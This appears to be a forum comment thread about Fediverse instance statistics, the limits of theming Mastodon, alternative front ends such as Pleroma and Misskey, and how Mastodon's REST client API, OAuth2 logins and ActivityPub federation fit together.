That'd be cool, but it just uses publicly available APIs for this. Most of the data like that isn't reported through the public APIs across various types of software. Bad data is tossed out (e.g., the you-think-your-fake-numbers-are-impressive.well-this-instance-contains-all-living-humans.lubar.me lists over 7 billion accounts) but data that is (as far as I know) accurate is presented as-is.
Looks like you are correct, yeah, and the raw logs show 7,410 of the 10,729 live instances have it. Lemme hack it in real quick; I can't put it onto the big pages and not sure how well adding another column to that table will work, but give me like five minutes.
I tried a few instances and none of the UIs clicked with me very much.
With themes, I don't just mean custom colors and fonts. I mean custom templates, so I can rearrange the position of elements and leave out some elements altogether.
Judging by how all the Mastodon sites seem to have minor CSS changes at most, I'd say not in any significant way. But there are other front ends for the Fediverse network. Perhaps check out instances running Pleroma, Misskey, or Soapbox and see if any of those suit you further. Some instances even run multiple front ends at once (typically on different subdomains) and you can use the same credentials to log in to all of them.
I don't understand how something can be a frontend for Mastodon.
Mastodon is an ActivityPub client.
If you write a new application from scratch that also uses the ActivityPub protocol, like Pinafore, it is not a frontend for Mastodon. It is another ActivityPub client, right?
I think this is where the confusion stems from, the way I understand it:
Mastodon is a server that implements the federation part of the ActivityPub protocol to exchange objects with compatible server software. It has functionality which exceeds the ActivityPub client-to-server protocol, which it doesn't implement; it opts to instead have its own client API. [1]
So if you were to write an application using the ActivityPub C2S protocol, you could not directly communicate with a Mastodon server, but you could interact with objects created by a Mastodon server through another server software implementing both the federation and C2S protocols.
So in that sense they are Mastodon frontends because they probably use the Mastodon specific API instead of the ActivityPub C2S protocol.
Here is for example a list of implementations which includes whether the client-to-server protocol is supported [2].
So as I understand it, Mastodon is a Ruby on Rails web server that speaks to other instances using the ActivityPub protocol in a technical sense.
You register with a given Mastodon instance which speaks ActivityPub to other servers which may or may not be Mastodon instances as well.
Now your home Mastodon instance also serves a React frontend, which is technically acting as an OAuth2 client that speaks to the backend via REST APIs (as opposed to, say, server-side rendered HTML).
Similarly, mobile apps connecting to your preferred instance are also OAuth2 clients.
In that sense, you can use a different frontend to speak directly to the REST APIs offered by your Mastodon instance of choice.
This all being one level above ActivityPub itself of course.
If I register with a Mastodon instance, then why do I need a "home Mastodon instance"? Wouldn't I just use the web frontend provided by the instance I registered with?
Your content is federated but your account is not, so in order to actually perform actions, you need to make calls back to your home instance.
In a literal sense, your username and password / authentication tokens live on that server and are unknowable to other servers.
You might imagine that if there were federation of accounts, then any random server could simply eat up passwords/password hashes.
That said, you can presumably use any client as long as it uses the APIs of the home instance.
You can browse other instances and do a remote follow, however, where that instance calls back to your home instance to initiate the follow action; but it requires telling the remote server what your full ID is (@Timja@home.instance) so it knows where to call back to.
No, it's incredibly difficult to style Mastodon beyond minor CSS additions via the admin panel. If you really want to change anything substantial you need to fork the entire project.
There's the 'advanced web interface' which allows you to choose several columns with your choice of stuff in each. You enable it by going to settings in your browser.